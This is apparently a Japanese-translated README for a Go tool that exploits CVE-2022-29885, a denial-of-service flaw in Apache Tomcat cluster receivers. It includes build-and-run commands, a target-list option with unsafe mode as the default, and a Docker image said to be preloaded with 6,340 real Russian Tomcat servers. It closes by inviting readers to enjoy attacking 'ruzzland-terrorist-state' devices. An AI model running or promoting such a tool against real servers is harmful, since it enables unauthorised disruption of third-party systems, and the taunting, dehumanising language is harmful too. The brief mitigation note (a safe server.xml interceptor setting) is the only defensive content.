
Apache Tomcat DoS (CVE-2022-29885) エクスプロイト
Apache Tomcat DoS(CVE-2022-29885)エクスプロイト。 EncryptInterceptor(Tomcat Cluster)におけるサービス拒否。
対象マシンはCluster Nio Receiverを起動している必要があります。
特殊なTCPパケットを送信すると、対象にサービス拒否を引き起こします。
EncryptInterceptorを使用しているかどうかに関わらず、以下の条件下でサービス拒否の脆弱性が存在する可能性があります:
Tomcatクラスター機能が有効で、通信にNioReceiverを使用している場合。
すべてのバージョンのTomcatが影響を受けます。唯一の対策は信頼できるネットワークを使用することです。
安全な設定ファイルserver.xmlには以下が含まれます
<Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
encryptionAlgorithm="AES/CBC/PKCS5Padding"
encryptionKey="ANY_KEY(LENGTH:32)"/>
その他の設定はすべて安全ではありません。
アプリケーション
1. git clone https://github.com/iveresk/CVE-2022-29885.git
2. cd CVE-2022-29885
3. go build -o /cve-2022-29885
4. ./cve-2022-29885 -t <target_url or file_name> [OPTIONAL] -s false -d false
- t - ターゲットURLまたはファイル名
- d - デバッグ {true, false} フラグ。ログの有効/無効を設定します。
- s - 安全/不安全モード切替スイッチ。デフォルトは不安全です。
Dockerには事前定義された6340台のruzzian Apache Tomcatサーバーが、10個の最も一般的なTomcatポートで多重化されています。
デフォルトではUnsafeモードがプリセットされています。
docker run -d masterroot/cve-2022-29885
ruzzland-terrorist-state VoIPデバイスでお楽しみください :D

詳細については、Keybaseからお気軽にご連絡ください。